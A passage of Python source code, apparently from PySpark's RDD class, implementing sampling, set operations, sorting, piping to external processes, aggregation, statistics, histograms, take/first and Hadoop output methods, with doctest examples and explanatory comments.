return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
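# Illustrative check: for total=1000 and num=100 without replacement, fraction = 0.1 and
# gamma = -ln(5e-5)/1000 ~= 0.0099, so the rate returned below is roughly
# 0.1 + 0.0099 + sqrt(0.0099**2 + 2*0.0099*0.1) ~= 0.155.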
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
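# Illustrative note: with numPartitions=4 and 100 sorted sample keys, bounds becomes
# [samples[25], samples[50], samples[75]]; rangePartitioner below then routes each key by
# binary search against these cut points.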
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements ``(a, b)`` where ``a`` is in `self` and
``b`` is in `other`.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = unicode(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
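# Note: the empty `for i in range(0)` loop never yields anything; it only turns
# check_return_code into a generator so it can be chained after the stdout lines below,
# ensuring the exit code is inspected only after the child's output has been consumed.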
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
f = fail_on_stopiteration(f)
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
f = fail_on_stopiteration(f)
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function ``op(t1, t2)`` is allowed to modify ``t1`` and return it
as its result value to avoid object allocation; however, it should not
modify ``t2``.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
op = fail_on_stopiteration(op)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions ``op(t1, t2)`` is allowed to modify ``t1`` and return it
as its result value to avoid object allocation; however, it should not
modify ``t2``.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
a U and one operation for merging two U's.
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
seqOp = fail_on_stopiteration(seqOp)
combOp = fail_on_stopiteration(combOp)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
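# Worked example: with 100 partitions and depth=2, scale = ceil(100 ** 0.5) = 10, so the
# loop below runs once and shrinks 100 partitions to 10 partially aggregated partitions
# before the final reduce(combOp) on the driver.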
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a :class:`StatCounter` object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) insertion to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
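# counters has len(buckets) slots but there are only len(buckets) - 1 bins; values equal
# to maxv land in the extra final slot, which is folded into the last, right-closed bin here.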
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first parameter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
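# Worked example: asking for num=100 after scanning one partition that yielded 10 items
# gives int(1.5 * 100 * 1 / 10) - 1 = 14, which the cap min(max(14, 1), 1 * 4) then
# reduces to 4 partitions for the next pass.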
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
try:
yield next(iterator)
except StopIteration:
return
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
"org.apache.spark.api.python.JavaToWritableConverter".
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or "org.apache.spark.api.python.JavaToWritableConverter". The
`conf` is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
"org.apache.spark.api.python.JavaToWritableConverter".
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or "org.apache.spark.api.python.JavaToWritableConverter". The
`conf` is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the "org.apache.hadoop.io.Writable" types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is :class:`pyspark.serializers.PickleSerializer`, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
:param path: path to text file
:param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
